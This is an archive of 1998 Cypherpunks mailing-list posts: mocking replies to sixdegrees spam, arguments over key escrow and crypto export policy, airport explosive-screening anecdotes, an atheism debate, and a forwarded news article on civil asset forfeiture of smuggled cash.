frantz@netcom.com | the key.     - Phil Ochs   | Los Gatos, CA 95032, USA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 18 Sep 1998 16:51:06 +0800
To: cypherpunks@toad.com
Subject: Re: Your new password
Message-ID: <199809182146.XAA13489@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




Name: Mark Salamon
spamhaven password: dumbshit

Congratulations Mark. You're well on your way to becoming a full
member of the Hall of Shame. Here is your member password: dumbshit. Use
it to log-in on the home page at the Spam Haven Web site,
http://www.sixdegrees.com. We'll ask you for a little more information to
complete your registration, like how many thousands of dollars in
resources you've stolen in your career, and then you'll be ready to start
networking.

It's important that you check your postal mail often, because it will only
hold so many magazine subscriptions. Your membership will not be complete
until you make yourself look even more clueless. 

Once you've successfully made an even bigger fool out of yourself, just go
to Personal Profile and you'll be able to choose your own password. We
suggest that you set it to something which describes your company, 
like "careless," "thief," "pathetic," or "spamhaven."

Thanks for becoming part of the Internet Hall of Shame. We're looking
forward to seeing you at the site.

====================================================================
PLEASE NOTE: You may receive many magazine subscriptions in the next 
few weeks. If you believe that you have been classed as a complete 
loser in error, go to a reputable company instead of a spam haven. 
Send all communications to Spamford at LWRules@BELLATLANTIC.NET and
someone will get back to you as soon as possible.
====================================================================

E.DI.ASS.1

On Fri, 18 Sep 1998, sixdegrees wrote:

> 
> Name: Lefty CyberSlasher
> sixdegrees password: landmelt
> 
> Congratulations Lefty. You're well on your way to 
> becoming a full sixdegrees(tm) member. Here is your member 
> password: landmelt. Use it to log-in on the home page 
> at the sixdegrees Web site, http://www.sixdegrees.com. 
> We'll ask you for a little more information to complete your 
> registration, and then you'll be ready to start networking. 
> 
> It's important that you return to the site and log-in. Your 
> membership will not be complete until you do so.
> 
> Once you've successfully logged in with your password, just go 
> to Personal Profile and you'll be able to choose your own 
> password.
> 
> Thanks for becoming part of sixdegrees. We're looking forward 
> to seeing you at the site. 
> 
> ====================================================================
> PLEASE NOTE: All replies to this address are processed by a computer.
> If you believe you received this e-mail in error, and it was not your 
> intention to become a sixdegrees member, or if you have any problems, 
> questions or requests send an e-mail to issues@sixdegrees.com
> and someone will get back to you as soon as possible.
> ====================================================================
> 
> 
> E.SI.BAM.1
> 
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 18 Sep 1998 18:14:36 +0800
To: CyberPorno@XXXHotFucks.COM
Subject: Welcome to the CyberPorno Members List!
Message-ID: <199809182308.BAA20354@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



ERROR: The return address was not valid. Accordingly, the administrative
contact of the site has been signed up for the CyberPorno mailing list.

Thank you for mailing the CyberPorno mailing list, Mark! You're well on your
way to receiving lots of CyberPorno. As you must know since you mailed us,
we specialize in ensuring that you receive as many porno ads, binaries,
sexual propositions, and copies of the Starr Report as possible. 

Accordingly as per the agreement, your address is being submitted to
alt.sex.wanted, alt.binaries.pictures.erotica, and over 200 Web sex sites.
Your address is also being signed up for 100 copies of the Starr Report, 
and each page will be sent as an uncompressed graphics file. You have also
been signed up with 15 XXX Pics of the Hour clubs, so you'll never be
without again! Your address and name are also being submitted to over 
25 Web personals sites for gay men, 2 sites for men with small penises, and
17 sites for people with severe sexual dysfunctions.

You're in luck and got us while we're offering a special limited time deal.
As a FREE bonus, your name, home address, phone number, email address, and
place of employment have been sent to the New York Times and the State of
New York. Congratulations! Tomorrow you'll be a registered sex offender,
kiddy porn trader, and all around disgusting guy!

Since their addresses were on this too, your coworkers have also been signed
up.

Once again, thank you for mailing the CyberPorno mailing list.

====================================================================
PLEASE NOTE: All messages to the CyberPorno mailing list are 
processed by a computer. If you believe you have been added to the
CyberPorno membership list in error, that's too bad because, like 
sixdegrees(tm), we don't care about your complaints. If you have 
questions or requests send an e-mail to nobody@replay.com and 
someone will get back to you before the sun goes nova.
====================================================================

On Fri, 18 Sep 1998, sixdegrees wrote:

>
> Name: Spermy CyberPorno
> sixdegrees password: rampnull
>
> Congratulations Spermy. You're well on your way to
> becoming a full sixdegrees(tm) member. Here is your member
> password: rampnull. Use it to log-in on the home page
> at the sixdegrees Web site, http://www.sixdegrees.com.
> We'll ask you for a little more information to complete your
> registration, and then you'll be ready to start networking.
>
> It's important that you return to the site and log-in. Your
> membership will not be complete until you do so.
>
> Once you've successfully logged in with your password, just go
> to Personal Profile and you'll be able to choose your own
> password.
>
> Thanks for becoming part of sixdegrees. We're looking forward
> to seeing you at the site.
>
> ====================================================================
> PLEASE NOTE: All replies to this address are processed by a computer.
> If you believe you received this e-mail in error, and it was not your
> intention to become a sixdegrees member, or if you have any problems,
> questions or requests send an e-mail to issues@sixdegrees.com
> and someone will get back to you as soon as possible.
> ====================================================================
>
>
> E.SI.BAM.1
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Fri, 18 Sep 1998 12:23:56 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Questions for Magaziner?
In-Reply-To: <v04011700b22791ad2d2d@[139.167.130.248]>
Message-ID: <Pine.LNX.3.96.980919012122.14249B-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 18 Sep 1998, Robert Hettinga wrote:

> Anyway, In light of more recent crypto-shenanigans from Billary, and the
> fact that this thing's a small crowd, I figured I'd ask if anyone on these
> lists had a question they wanted me to ask him.

"Was the encryption used by Bill Clinton to encrypt his deposition
escrowed, and if so, with whom?"

> One I want to ask, right off the top of my head is, "Given your recent
> successes in regulating foreign cryptography, what's your timetable for
> regulating domestic cryptography?"

Or banning outright.

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Fri, 18 Sep 1998 20:21:06 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Cyberpunks Signal-to-Noise Ratio
Message-ID: <19980919012849.4800.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain




Quoting Tim May (tcmay@got.net):
> And that proceeds in spurts, not surprisingly, as topics come to the fore.

Are you seriously advocating further discussion of Clinton's penis?
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Sat, 19 Sep 1998 00:46:11 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Airline security searches
In-Reply-To: <199809190501.HAA12423@replay.com>
Message-ID: <3.0.3.32.19980919014810.035277ec@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain



At 07:01 AM 9/19/98 +0200, Anonymous wrote:
>This analysis, it turned out, was wiping a coffee filter over the strap
>of its bag, and sticking the coffee filter into a slot on a machine.
>No solvent even.  The machine had columns labelled TNT RDX NITRO PETN HMX.
>I recognized the first four as high explosives.  Later, I wondered
>if people with angina (who take nitro orally) ever set this off.
>Most of them, of course, are not bearded eastern-european/semetic
>guys in their 30's who look worried and in a hurry.

I didn't take a close look at the process, but I had this happen to me on a
flight headed towards San Jose using America West.  They did the chemical
screen here in Atlanta airport.  I'm white, normal looking Atlanta guy, but
they said at the ticket counter they were doing random searches, handed me
a piece of paper, and said I would get my boarding pass after I was checked.

  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Fri, 18 Sep 1998 13:34:16 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Questions for Magaziner?
In-Reply-To: <v04011700b22791ad2d2d@[139.167.130.248]>
Message-ID: <Pine.LNX.3.96.980919023009.14249D-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 18 Sep 1998, Robert Hettinga wrote:

> Anyway, In light of more recent crypto-shenanigans from Billary, and the
> fact that this thing's a small crowd, I figured I'd ask if anyone on these
> lists had a question they wanted me to ask him.

"With all the demands from Governent to escrow keys, what steps are being
taken to protect the these keys and/or backdoors from misuse from people
within the Government and those outside of the Government?"

"Would you use escrowed cryptography for your private communications?  Who
would you trust to hold those keys?"

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Whtsametau@aol.com
Date: Sat, 19 Sep 1998 01:50:35 +0800
To: cypherpunks@toad.com
Subject: It's Nobody's Business!
Message-ID: <c94f7b82.36035337@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



I see things haven't changed much around here.  [BIG GRIN!]

Stan, bass/vocals
Nobody's Business
members.aol.com/StanSqncrs/nobiz.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 18 Sep 1998 20:00:50 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Calif Leads US with Mobile Tracker
Message-ID: <199809190059.CAA27983@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 18 Sep 1998, John Young wrote:

> 
> Thanks to John Gilmore.
> 
> 
> http://www.msnbc.com/local/KNBC/14920.asp
> 
> CHP introduces cellular-friendly 911 system
> 
> Operators will now be able to capture the
> telephone number and location of the caller
> within a half-block area

While I understand the implications and outrage here, anybody who uses
cellular phones as a measure of security is a total idiot. The connections
usually aren't encrypted, they're radiated to the rest of the area, and
your position can be triangulated (half-ass) if nothing else.

With that in mind, maybe this one is actually legitimate. If criminals
and/or patriots are that stupid, they'll get caught for something else
like driving drunk two states away.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Fri, 18 Sep 1998 16:06:14 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Questions for Magaziner?
In-Reply-To: <v03130302b2285ea5ce37@[209.133.20.24]>
Message-ID: <Pine.LNX.3.96.980919044058.14463A-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 18 Sep 1998, Tim May wrote:

> (I'm leaving the damned multiple lists cc:ed on this, as I have no idea
> where this thread came from. For those of you who send me notes saying I am
> not allowed to post on your list, plonk.)

I usually leave most of the cc:s due to not knowing who is reading what
anymore.  (Gateways being as they are...)

> >"Would you use escrowed cryptography for your private communications?  Who
> >would you trust to hold those keys?"
> 
> Well, I believe that even asking these sorts of questions (and possibly
> getting answers from government) plays into the hands of the GAKkers.

Depends.  With the right questions (assuming you get honest (Ha!) answers)
you can make them look like control freaks, hypocrites, and/or worse.

Hitting them with the unexpected can generate soundbites that can be used
for the cause.

Besides...  If you don't challenge them in public, the public tends to get
the impression that no one opposes this KRAP.

> After all, suppose they give pretty good answers? What if, for example,
> they propose a committee consisting of the entire Supreme Court, the
> Director of the Sierra Club, and so on, and say that a _unanimous_ vote is
> required to gain access to a key?

I would respond that they were lying.  I would also ask them if it was
going to be like the current wiretap authorization commissions that just
rubber stamp requests.

> Does this at all change the fundamental unconstitutionality of telling me
> that I will face imprisonment if I speak or write in a manner which is not
> part of their "escrow" arrangement? If I keep a diary without depositing an
> escrowed key with this noble, careful, thoughtful committee of wise persons?

Of course not.  And questions of constitutionality need to be asked of
them directly to their faces.  Without that direct confronation, they will
do whatever they damn well please.  (Not as if they don't now...)

> Of course not. My speech, my writing, my private codes, my whisperings, my
> phone conversations...all of these...are not subject to govenmwental
> approval. "Congress shall make no law..."

Encrypt! Encrypt! OK!

> Doesn't say that Congress or the courts of the President get to declare
> illegal certain modes of speaking. (*)
> 
> (* Please, I hope no one brings up "loud speech," "shouting fire," "obscene
> speech," "seditious speech," "slanderous speech," etc. This is well-trod
> ground, but clearly all of these apparent limits on speech, whether one
> agrees with them or not, have nothing to do with an overbroad requirement
> that speech only be in certain languages, that letters only be written on
> carbon paper with a copy filed with the government, and so on. The
> restrictions on _some_ kinds of speech are not a license to license speech,
> as it were, or to require escrow of papers, letters, diaries, and phone
> conversations and such.)

I am willing to argue that most of those restrictions are against what the
founding fathers meant when they wrote the document.  But currently we
live in a land where "consensus doublethink" is the nature of the law.

> My point about Alan's (and others') points is that if we get engaged in
> this kind of debate about how key escrow might work, we shift the debate
> from where it ought to be to where they _want_ it to be, namely, to issues
> of practicality.

What needs to be pointed out is that it CANNOT work.  By asking them if
they would use it, you point out that the system is so untrustworthy that
they themselves would not even use it.  (And if you say they would, you
just start laughing.)

> My view is that my writings are mine. They can try to get them with a
> search warrant or a court order, but they'd better not threaten me with
> imprisonment if I choose to write in some language they can't read. And
> that's all crypto really is, of course. Just another language.

The current administration has taken the tact that ANY argument, no matter
how irrational, to advance their legal position, must be used.  That has
to colapse opon itself after a while.  Whether it be through the total
errosion of their reputation capitol (What little is left.) or through
judges who cry "enough" and toss out the entire specious line of
reasoning.

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@earth.wazoo.com>
Date: Sat, 19 Sep 1998 01:31:24 +0800
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <199809190527.HAA13780@replay.com>
Message-ID: <199809190626.GAA09380@earth.wazoo.com>
MIME-Version: 1.0
Content-Type: text/plain



  > Is anybody on this list form one of these nations just out of
  > curiosity?

  > Iran, Iraq,Libya, Syria,Sudan, North Korea and Cuba.

Yes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 19 Sep 1998 00:05:40 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809190501.HAA12423@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



		
So I fly home Friday from San Jose.  Probably because I was
in a hurry, after walking through the magnetometer and x-raying
my stuff, a security dude grabbed my laptop and said he wanted
to 'analyze' it.  Yeah sure whatever, I decided not to protest
I was late for my flight.

This analysis, it turned out, was wiping a coffee filter over the strap
of its bag, and sticking the coffee filter into a slot on a machine.
No solvent even.  The machine had columns labelled TNT RDX NITRO PETN HMX.
I recognized the first four as high explosives.  Later, I wondered
if people with angina (who take nitro orally) ever set this off.
Most of them, of course, are not bearded eastern-european/semetic
guys in their 30's who look worried and in a hurry.

Anyway, that was it, and I made my flight.  Didn't even open
the laptop's case.  

The machine name was ION-something; I wonder whether it sucked vapors
from the fiber disk or whether it was a neutron-spectrometer (?) device.

(Had this been a UK Customs 'inspection' of the contents of the disk, I
might have had to explain the half-gig of "noise" I have on the disk.
Only, it really is noise. Really.)

Anyway, the moral of the story: 

Don't store your laptop with your explosives :-) 












  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 19 Sep 1998 00:30:28 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809190527.HAA13780@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Is anybody on this list form one of these nations just out of curiosity?

Iran, Iraq,Libya, Syria,Sudan, North Korea and Cuba. 

I would find it funny considering the exemption made for them in the new crypto policy :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 19 Sep 1998 01:09:26 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199809190609.IAA16339@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>a security dude grabbed my laptop and said he wanted
>to 'analyze' it.  Yeah sure whatever, I decided not to protest
>I was late for my flight.
>This analysis, it turned out, was wiping a coffee filter over the strap
>of its bag, and sticking the coffee filter into a slot on a machine.
>No solvent even.  The machine had columns labelled TNT RDX NITRO PETN HMX.
.....
>The machine name was ION-something; I wonder whether it sucked vapors
>from the fiber disk or whether it was a neutron-spectrometer (?) device.

Try asking them where they've posted the California Prop 65 warning
indicating which toxic chemicals are used in the system :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 19 Sep 1998 07:59:07 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: atheism (was: RE: Democracy... (fwd)) (fwd)
Message-ID: <199809191325.IAA08217@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: pjm@spe.com
> Date: Sat, 19 Sep 1998 11:24:32 +0200
> Subject: atheism (was: RE: Democracy... (fwd))

>      Not all philosophies are religions.

If we are talking philosophies of the range to include 'natural philosophy'
(ie physics) then you are correct. Fortunately, this attempt at shifting the
topic of discussion away from personal or individual philosophies relating
to the relationship between individuals, God, and the cosmos  won't work.

This is called a straw-man. Pick an argument that you want to (dis)prove but
don't know how. Then pick a similar but non-identical (or fail to prove the
identity) which one knowns how to (dis)prove. Finaly claim that the second
easier (since it is (dis)provable) problem is identical to the first.

>  Asserting so is an attempt
> to make one or both of the terms meaningless.

And trying to change the subject of discourse is as well. A philosophy is a
set of beliefs, period. In this particular case we are discussing personal
or individual philosophies and from definition and practice they are
identical. Religion after all is nothing more than a set of beliefs and
therefore falls under 'personal philosophy'.

Just remember this, it's your ugly baby.

>      There are two forms of atheism (visit alt.atheism.moderated for
> an unending discussion).  "Strong" atheists state that they "believe
> that god does not exist."  "Weak" atheists state that they "do not
> believe that god exists."

Changing the side on which the 'do not' resides doesn't change the meaning.
These two sentences are identical in content and meaning.

I belive god does not exist

I do not believe god exists

or,

^(A) = (^A)

>      Do you believe in leprechauns, because there is no proof that
> they don't exist?  Do you believe in the Hindu pantheon?

Whether I believe in them makes no difference to their existance (you really
really need to quit taking drugs). This is the same sort of crap reasoning
the UFO nut-cases partake in. They run around asking "Do you believe in
aliens?" when the question that needs asking is "How do we prove aliens have
been here?", and in many cases they take the two to be equivalent.

Hindu pantheon is a different form of Pantheism that I practice. I don't
agree with many of the points that Hindu, Aztec, Buddhist, New Age, etc.
pantheist practice, it's too anthropocentric for my taste and in the case
of New Age Pantheism (gag) they've simply given transcendance a new form.
And I further believe that the Hindu practice of sweeping ants out of ones
way and wearing a veil to inhibit bug inhalation is taking it too far the
other way (though I respect and practice the spirit of their actions).

Respect does not mean subserviance.

>      Without reason and logic, how do you propose to prove these
> assertions?

I'm not trying to prove anything, you are. I'm just blowing holes in your
reasoning.

>  Reason and logic don't "constrain", they provide a
> framework for discovery.  This framework is unavailable to, and indeed
> actively rejected by, believers in the supernatural.  Any meaningful
> definition of the word "inquiry" presupposes the use of logic.

Ohhhh, supernatural is by definition in this discussion equivalent to
transcendental. I'll say it again, there are two types of religion - those
who believe transcendentalism exists (ie traditional religions) and those
that don't (eg Pantheism). It is not reasonable nor logical to expect the
natural rules of experience to be recognized by the supernatural. 

Now I can inquire into many things without using a particular type of logic
(you keep writing as if there is only one form of logic - perhaps this is
the root shortcoming in your reasoning). So trying to say that inquiry is
equivalent to using logic is a misunderstanding of both inquiry and logic.

The question that you are skirting around is:

If God exists and created the universe, does this imply that it is
constrained by that creation?

You can answer that question with three answers:

Yes	Pantheism and some other forms of pagan religions

No	Traditional religions

?	Agnostic (if you'd like to know,
        Nihilism (if you believe the question is irrelevant),
        etc.

>      All faith-based assertions are by definition irrational.  Mystics
> frequently speak of transcendence as if the word denotes a concept
> with a particular meaning, but never provide a coherent definition.
> Perhaps you'll surprise me?

Transcendence is the belief that there is something more than the earthly
veil. In other words, if you practice a transcendantal religion then by
definition you believe in a ghost-in-the-machine of one form or another.

If you like you can think of it as one set of religions believes there is
purpose and reason in existance whereas others believe that it is all random
dice (and yes that is a broad brush I'm painting with).


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 19 Sep 1998 08:26:26 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Tougher laws are sought to seize cash
Message-ID: <v0401172fb22954e840e2@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Thu, 17 Sep 1998 08:45:24 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Tougher laws are sought to seize cash
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  Bergen (New Jersey) Record
http://www.bergen.com/news/njmone199809154.htm

Tougher laws are sought to seize cash

Tuesday, September 15, 1998

By ADAM PIORE
Washington Correspondent

WASHINGTON -- Federal law enforcement
officials on Monday unveiled a plan they say will
help stop the flow of billions of dollars in drug money
across the nation's borders every year.

Hailed as a "major step forward" in the fight against
money laundering, the Justice Department proposal
would broaden the government's ability to seize the
profits of such illicit activity as drug dealing.

It now is illegal to try to leave the country with more
than $10,000 in currency without reporting it to U.S.
Customs officials. Violations are punishable by up to
five years in prison and seizure of the money. But in
June, the U.S. Supreme Court dealt a serious blow
to efforts to seize the unreported cash, ruling in a
precedent-setting case that such seizures often
violate constitutional protections against "excessive
fines."

The new proposal is aimed at correcting the
loopholes opened up in the June court decision. It
would for the first time allow law enforcement
officials to arrest people concealing currency before
they even reach the border.

It would allow the seizure of $10,000 or more at the
nation's ports and highways -- hundreds of miles
from any crossing -- if agents can prove that there is
intent to smuggle the concealed money out of the
country.

But it goes beyond that, giving agencies tools they
have not had in the fight to stop the flow of illegal
drug profits out of the country, said Stefan D.
Cassella, the assistant chief of the money-laundering
and forfeiture section of the U.S. Department of
Justice.

"This is a major step forward to address a new
problem," Cassella said. "We know that the covert
movement of currency across borders is indicative
and inherently related to criminal activity."

Civil libertarians condemned the proposed law,
which the Justice Department sent to Congress on
Monday, because they said it would expand the
ability of law enforcement agencies to seize currency
and keep it.

A series published in The Record this year revealed
how New Jersey, with its sprawling seaport,
international airport, lax laws, and proximity to New
York and Philadelphia, had emerged as a hub for
money laundering and currency smuggling over the
past 15 years. Cassella said the decision to push for
the more stringent laws was inspired in part by The
Record's stories.

In its letter to Congress, the Justice Department
cited the series as evidence of the growing problem
in currency smuggling.

The proposed law would give officials the ability to
go after a wider range of smuggling that has been
difficult for them to stop. Every year, for instance,
billions of dollars in illegal drug profits is smuggled
across the border unchecked, crammed into washing
machines, refrigerators, or hidden under false
bottoms in suitcases and trucks bound for the
border.

Over the past nine months, customs inspectors have
seized more than $11 million at the border that
stretches from Texas to California.

And at Port Newark, Customs agents seized $5.5
million in fiscal year 1997, the fourth-highest amount
seized among all U.S. ports.

Cassella said the Justice Department hopes its
proposal will be offered as an amendment to
money-laundering legislation being considered by the
House. But several congressional staffers were
skeptical that the proposal would be considered by
this Congress, because of the controversy over civil
forfeiture. Congress is slated to adjourn is less than a
month.

In addition, the new regulations, if passed, would
likely face immediate legal challenges.

In June, the U.S. Supreme Court overturned the
seizure of $357,144 from a Hollywood, Calif., gas
station owner. Federal officials seized Hosep Krikor
Bajakajian's money after the Syrian immigrant tried
to carry it out of the country without reporting it --
even though he was told of the federal reporting
requirements by customs agents. A divided court
ruled the fine was excessive because the only impact
of Bajakajian's crime was to deprive the government
of "information on a piece of paper."

By creating a category of crime called "bulk cash
smuggling," law enforcement officials hope to
convince the Supreme Court that efforts to evade
detection could have a direct impact on the "security
and integrity" of the nation's borders, Cassella said.
The crime would be punishable by up to five years in
prison and forfeiture of the money involved.

"Bulk cash smuggling is an inherently more serious
offense than simply failing to file a customs report,"
Justice Department officials wrote in an explanation
of the bill provided to Congress. "Because the
constitutionality of forfeiture is dependent on the
'gravity of the offense' . . . it is anticipated that the full
forfeiture of smuggled money will withstand
constitutional scrutiny in most cases."

Local prosecutors hailed the proposed change.

"Clearly, it's an effort to convince the Supreme
Court that Congress did view this as more than a
mere reporting violation and that forfeiture of the
smuggled money is appropriate," said Marion
Percell, an assistant U.S. Attorney in Newark who
specializes in money-laundering cases.

Critics attacked the bill, calling it just another effort
by overzealous law enforcement officials to expand
seizure powers that deprive citizens of due process.

Roger Pilon, director of the Center for Constitutional
Studies at the Cato Institute, warned that civil asset
forfeiture is subject to abuse by law enforcement
authorities.

"This is unbelievable," he said. "Everything that
Justice does in this area is characterized as a 'major
step.' But that's no justification. Since when is it a
crime to take money out of the country? After all,
whose money is it?"

Rachel King, legislative counsel of the American
Civil Liberties Union, agreed. "The problem is they
have too much power to seize property," she said.
"The laws need to go the other way. What they can
do already is scary."

Staff Writers Julie Fields and Thomas Zambito
contributed to this article.

Copyright (c) 1998 Bergen Record Corp.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 19 Sep 1998 02:22:02 +0800
To: cypherpunks@cyberpass.net
Subject: RE: Cyberpunks Signal-to-Noise Ratio
Message-ID: <199809190724.JAA20244@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Isn't it in bad form to filter the Cypherpunk anonymous remailers on
the cypherpunk list?



---Matthew James Gering <mgering@ecosystems.net> wrote:
>
> What! I can't hear you!
> 
> You could always filter *aol*, *anon* and *sixdegrees*.
> 
> Or shout louder (i.e. contribute signal).
> 
> 	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 19 Sep 1998 11:23:17 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Oh my God...
In-Reply-To: <002d01bde375$d5f31b80$7c7ecfc0@stewart.smallworks.com>
Message-ID: <v03130306b2298a5b3888@[209.133.20.24]>
MIME-Version: 1.0
Content-Type: text/plain




(cypherpunks@toad.com replaced with cypherpunks@algebra.com)

At 7:33 PM -0700 9/18/98, Jim Thompson wrote:
>Forgive me if this has been covered on cypherpunks.  I hang out on
>coderpunks,
>and this is far too political for that list.  Please keep me Cc'd on any
>discussion
>on this topic.

Thank you for slumming on our list.

And thank you for reminding me to keep my lowly political stuff off of the
"good" lists....I needed that reminder to keep my filth here on
"cypherpunks."

BTW, "toad.com" is not one of the distributed lists. I guess you've been so
busy "writing code" that you are still ignorant of this transition.


>If true, RSA is dirty, SDI is dirty, Robertson Stevens is dirty, and Ron
>Brown,
>Jim Bizdos, Al Gore, John Huang and Sanford Robertson are going to jail.
>
>http://www.worldnetdaily.com/smith/980915.comcs.html

Well, if Ron Brown is put in jail they'll have to dig up the casket
containing the couple of pounds of what they found of him when his plane
hit that hillside near Sarajevo a couple of years ago.

You'd have known this, and the rest of that well-reported story cited
above, had you gotten off your "don't pollute the coderpunks" high horse
and actually read some political stuff.

Oh, and what code have you written lately?

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stu Green <stugreen@realtime.net>
Date: Sat, 19 Sep 1998 09:32:39 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: IP: Tougher laws are sought to seize cash (fwd)
In-Reply-To: <199809191445.JAA08476@einstein.ssz.com>
Message-ID: <3603C242.7D937C61@realtime.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim, Et al,
Recently I heard the retelling of a 'verbal memo' given contracted security
folks at Miami International Airport concerning spotting people with
'excessive cash'.  Besides the racist profiles and the cues of buying a
ticket with cash, destinations were high on the list and Las Vegas was the
most often mentioned destination for a 'good collar' (ie. cash
confiscation).  The feds are offering a reward of a percentage of what is
confiscated to the informants, in this case ticket sellers, baggage handlers
and local security providers (contractor and local police).  Seems that
bring more than 4 -5 K worth of green to gamble with is an excuse for
confiscation with no charges ever being made.  The operative mode here is an
assumption that they'll snag some wise guys and they won't freak and try to
regain their bucks....bad assumption and bad intentions.  This is the kind
of citizen vs. citizen activity that the East Germans and their Nazi mentors
were master in establishing and effecting.  The best way to destroy trust is
to a profit incentive to poke your face into your neighbor's garbage can and
report the droppings to the collectors of irrelavant information at the
ministry of injustice.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Sat, 19 Sep 1998 08:42:48 +0800
To: cypherpunks@cyberpass.net
Subject: [Fwd: IP: Tougher laws are sought to seize cash]
Message-ID: <3603B645.8C3992F5@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain




To: Robert Hettinga <rah@shipwright.com>
Subject: Re: IP: Tougher laws are sought to seize cash
From: Soren <sorens@workmail.com>
